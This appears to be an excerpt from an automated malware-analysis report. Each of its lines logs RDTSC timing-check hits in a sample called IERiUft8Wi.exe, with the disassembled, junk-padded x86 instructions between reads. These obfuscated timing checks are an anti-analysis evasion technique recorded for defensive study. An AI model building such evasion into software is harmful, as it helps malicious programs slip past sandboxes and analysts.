Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AC02C2 second address: AC02F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Ch 0x00000007 jmp 00007F0E3850A34Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F0E3850A34Bh 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AC02F2 second address: AC02F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AC02F6 second address: AC02FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: ABFD7B second address: ABFD85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: ABFD85 second address: ABFD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: ACDD2B second address: ACDD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: ACD9E4 second address: ACDA31 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0E3850A346h 0x00000008 jc 00007F0E3850A346h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jg 00007F0E3850A358h 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007F0E3850A350h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 js 00007F0E3850A346h 0x00000027 pushad 0x00000028 popad 0x00000029 pop esi 0x0000002a jmp 00007F0E3850A358h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AD05D5 second address: AD0603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E38E1CB26h 0x0000000d js 00007F0E38E1CB1Ch 0x00000013 jl 00007F0E38E1CB16h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AD0603 second address: AD0607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AD8364 second address: AD8368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AD8368 second address: AD8381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: ADFA0A second address: ADFA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: ADFA0E second address: ADFA12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AE29C4 second address: AE29C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AE29C8 second address: AE29D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA70A second address: AEA713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA713 second address: AEA719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AE925F second address: AE9271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AE951B second address: AE9538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0E3850A34Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0E3850A346h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AE9674 second address: AE969A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0E38E1CB27h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA393 second address: AEA3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0E3850A359h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA3B5 second address: AEA3CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB21h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA3CA second address: AEA3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F0E3850A346h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0E3850A34Fh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA3ED second address: AEA3F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA3F1 second address: AEA40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E3850A34Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEA40D second address: AEA420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E38E1CB1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEDD2B second address: AEDD2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEDD2F second address: AEDD35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEDD35 second address: AEDD4E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0E3850A34Dh 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEDE8F second address: AEDEAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEDEAC second address: AEDEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AEDEB6 second address: AEDEC0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AFCDBB second address: AFCDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E3850A346h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AFF92C second address: AFF932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AF88AE second address: AF88B8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E3850A34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AF88B8 second address: AF88CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F0E38E1CB18h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AF88CB second address: AF88D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B0F6C4 second address: B0F6DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E38E1CB1Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B0F41E second address: B0F42B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 je 00007F0E3850A346h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B245C4 second address: B245E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Eh 0x00000007 jnc 00007F0E38E1CB18h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0E38E1CB16h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B245E9 second address: B245ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B245ED second address: B245F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B245F1 second address: B245F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B249DD second address: B249E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B249E1 second address: B24A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0E3850A360h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F0E3850A358h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B24A0B second address: B24A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B24E49 second address: B24E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A357h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B24E66 second address: B24E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B24FC0 second address: B24FC6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B24FC6 second address: B24FD2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E38E1CB1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B25113 second address: B25150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F0E3850A352h 0x0000000b pop ebx 0x0000000c jnp 00007F0E3850A371h 0x00000012 jmp 00007F0E3850A355h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F0E3850A346h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B26D8C second address: B26D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jg 00007F0E38E1CB16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B29770 second address: B29786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B29CDF second address: B29D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1EE2h], eax 0x00000012 push eax 0x00000013 clc 0x00000014 pop edx 0x00000015 push dword ptr [ebp+122D33C6h] 0x0000001b mov dword ptr [ebp+1245551Bh], eax 0x00000021 push 6A0054CFh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B29D10 second address: B29D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B2D25F second address: B2D268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: B2D268 second address: B2D26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D40470 second address: 4D40476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D40476 second address: 4D4047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D4047A second address: 4D4048F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f mov edx, 7C2C725Eh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D4048F second address: 4D404CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F0E3850A34Ah 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E3850A357h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D404CF second address: 4D404F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 jmp 00007F0E38E1CB20h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+0Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D404F0 second address: 4D404F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D404F4 second address: 4D404F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D404F8 second address: 4D404FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D40547 second address: 4D4054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D4054B second address: 4D4055E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D4055E second address: 4D40564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D40564 second address: 4D40587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F0E3850A34Bh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D40587 second address: 4D4058C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D6077B second address: 4D6077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D6077F second address: 4D60785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60785 second address: 4D6081A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, D7h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov dx, ax 0x0000000f mov dx, si 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F0E3850A358h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c jmp 00007F0E3850A34Eh 0x00000021 mov si, 40B1h 0x00000025 popad 0x00000026 xchg eax, ecx 0x00000027 pushad 0x00000028 mov ebx, esi 0x0000002a pushfd 0x0000002b jmp 00007F0E3850A356h 0x00000030 sub si, B1B8h 0x00000035 jmp 00007F0E3850A34Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007F0E3850A359h 0x00000042 xchg eax, ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 mov ecx, ebx 0x00000048 mov edi, 2799113Ah 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D6081A second address: 4D60835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60835 second address: 4D608B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F0E3850A352h 0x0000000e mov dword ptr [esp], esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0E3850A34Eh 0x00000018 sbb si, 4008h 0x0000001d jmp 00007F0E3850A34Bh 0x00000022 popfd 0x00000023 mov ah, 66h 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-04h] 0x00000029 pushad 0x0000002a mov edi, 735452E4h 0x0000002f pushfd 0x00000030 jmp 00007F0E3850A34Dh 0x00000035 and cx, 0326h 0x0000003a jmp 00007F0E3850A351h 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0E3850A34Dh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D608B6 second address: 4D608E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F0E38E1CB1Dh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F0E38E1CB23h 0x00000017 pop ecx 0x00000018 mov cx, dx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D608E8 second address: 4D60917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6DDF0817h 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 4E3EAF46h 0x00000016 call 00007F0E3850A357h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D6096B second address: 4D6097D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D6097D second address: 4D6098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D6098D second address: 4D609A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D609DF second address: 4D609EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D609EE second address: 4D60A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F0E38E1CB1Bh 0x0000000c sub eax, 599B0E0Eh 0x00000012 jmp 00007F0E38E1CB29h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60A2B second address: 4D60A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60A2F second address: 4D60A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60A35 second address: 4D60A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F0E3850A350h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E3850A357h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60A76 second address: 4D60A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB24h 0x00000009 rdtsc
